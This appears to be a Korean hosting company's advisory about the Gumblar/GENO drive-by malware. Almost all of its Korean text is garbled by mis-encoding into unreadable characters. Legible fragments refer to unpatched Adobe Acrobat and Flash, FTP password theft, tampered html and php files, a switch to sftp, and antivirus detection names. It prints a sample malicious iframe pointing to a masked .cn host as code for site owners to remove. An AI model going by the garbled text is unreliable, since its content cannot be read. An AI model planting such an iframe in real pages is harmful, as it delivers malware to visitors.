|
|||||||||||||
ȸ¿ø°¡ÀÔ |
¾ÆÀ̵ð/Æнº¿öµå ã±â | ||
°¡ÀÔÇÑ À̸ÞÀÏ ÁÖ¼Ò°¡ ±â¾ï³ªÁö ¾ÊÀ¸½Ã¸é ·©Å©¾÷ °í°´¼¾ÅÍ 1544-6862·Î ¿¬¶ôÁÖ¼¼¿ä. |
ÃÖ±Ù °Ëºí·¯(Gumblar) ȤÀº GENO ¶ó°í ºÒ¸®´Â ¾Ç¼ºÄڵ尡 ±Þ¼ÓÈ÷ ÀüÆĵǰí ÀÖ½À´Ï´Ù.
ÇØ´ç ¾Ç¼ºÄÚµå´Â ¾îµµºñ(Adobe)»çÀÇ ¾ÆÅ©·Î¹îÀ̳ª Ç÷¡½¬ÀÇ º¸¾È ÆÐÄ¡°¡ µÇÁö ¾ÊÀº PC°¡ ƯÁ¤ À¥ »çÀÌÆ®¸¦ ¿±â¸¸ Çصµ °¨¿°µÇ´Â
'µå¶óÀÌºê ¹ÙÀÌ ´Ù¿î·Îµå' ¹æ½ÄÀ¸·Î ÀüÆĵǰí ÀÖ¾î °¨¿°¼Óµµ°¡ ¸Å¿ì ºü¸¨´Ï´Ù.
¶ÇÇÑ °¨¿°µÈ PC ÀÌ¿ëÀÚ°¡ À¥»çÀÌÆ®ÀÇ ÆÄÀÏÀ» °ü¸®ÇÏ´Â FTP ÇÁ·Î±×·¥À» °¡Áö°í ÀÖÀ» °æ¿ì ID¿Í ºñ¹Ð¹øÈ£¸¦ »©³»
ÇØ´ç À¥»çÀÌÆ®ÀÇ index , main µîÀÇ À̸§À» °¡Áø html, php ÆÄÀϵéÀ» º¯Á¶Çؼ ¾Ç¼ºÄڵ带 ´Ù¿î¹Þ´Â Äڵ带 ½É¾î³õ°Ô µË´Ï´Ù.
ÇØ°á ¹æ¹ýÀº
1) ÇØ´ç pc ¿¡¼ ¾Ç¼ºÄڵ带 Á¦°ÅÇØ¾ß ÇÕ´Ï´Ù. Á¦°Å°¡ ¾î·Á¿ï °æ¿ì OS ¸¦ À缳ġÇØ¾ß ÇÕ´Ï´Ù.
±× ´ÙÀ½ OS ¿Í ¾îµµºñ(Adobe)»çÀÇ ¾ÆÅ©·Îºª(Acrobat)°ú Ç÷¡½¬(Flash) ÇÁ·Î±×·¥ÀÇ º¸¾ÈÆÐÄ¡¸¦ ÃֽűîÁö ¼³Ä¡ÇØ¾ß ÇÕ´Ï´Ù.
¾Ç¼ºÄڵ尡 Á¦°ÅµÇÁö ¾ÊÀº »óÅ¿¡¼ ´Ü¼øÈ÷ ºñ¹Ð¹øÈ£¸¦ ¹Ù²Ûä ftp Á¢¼ÓÀ» ÇÏ°Ô µÇ¸é Áö¼ÓÀûÀ¸·Î ID ¿Í ºñ¹Ð¹øÈ£°¡ À¯ÃâµÇ¾î¼ »çÀÌÆ® º¯Á¶°¡ Áö¼ÓµË´Ï´Ù.
ºÎµæÀÌ ÇÏ°Ô ¾Ç¼ºÄÚµå Á¦°ÅµÇ±â Àü¿¡ ±ÞÇÏ°Ô ¼öÁ¤À» ÇϽǷÁ°í ÇÑ´Ù¸é ºñ¹Ð¹øÈ£¸¦ ¹Ù²Ù½Ã°í ftp »ç¿ëÀ» ¸·°í, ´ë½Å sftp ¸¦ »ç¿ëÇØ¾ß ÇÕ´Ï´Ù. sftp ´Â ÇâÈÄ µ¿ÀÏ ¹®Á¦ ¿¹¹æÀ» À§Çؼ¶óµµ ftp ´ë½Å °è¼Ó »ç¿ëÀ» ÇϽǰÍÀ» ±ÇÀåÇص帳´Ï´Ù.
2) º¯Á¶µÈ html, php ÆÄÀÏ¿¡¼ ´ÙÀ½°ú °°Àº ÇüÅÂÀÇ Äڵ带 Á¦°ÅÇϽñ⠹ٶø´Ï´Ù.
< iframe src = " http://xxxxxxxxxxx.cn:8080/index.php" width=198 height=141
°ü·ÃÀÚ·á:
http://www.boannews.com/media/view.asp?idx=16569&kind=1
http://www.fnnews.com/view?ra=Sent0901m_View&corp=fnnews&arcid=090522164152&cDateYear=2009&cDateMonth=05&cDateDay=22
http://garwarner.blogspot.com/2009/06/gumblars-48000-compromised-domains.html
¹é½Å¸¶´Ù ºÎ¸£´Â À̸§.
½Ã¸¸ÅØ Infostealer.Daonol
Ä«½ºÆÛ½ºÅ° Trojan-Dropper.Win32.Agent.apfn
¸¶ÀÌÅ©·Î¼ÒÇÁÆ® Win32/Daonol.F
¾Ë¾à(BitDefender) Exploit.PDF-JS.Gen
º» Çö»óÀº »çÀÌÆ®°¡ ÃʱâȸéÀÌ ´À·ÁÁö°Å³ª, ȸéÀÌ Æ²¾îÁö°Å³ª, °ü¸®ÀÚ¸ðµå Á¢±Ù½Ã ¿¡·¯¸Þ½ÃÁö Ãâ·Â µî À» º¸½Ç ¼ö ÀÖ½À´Ï´Ù.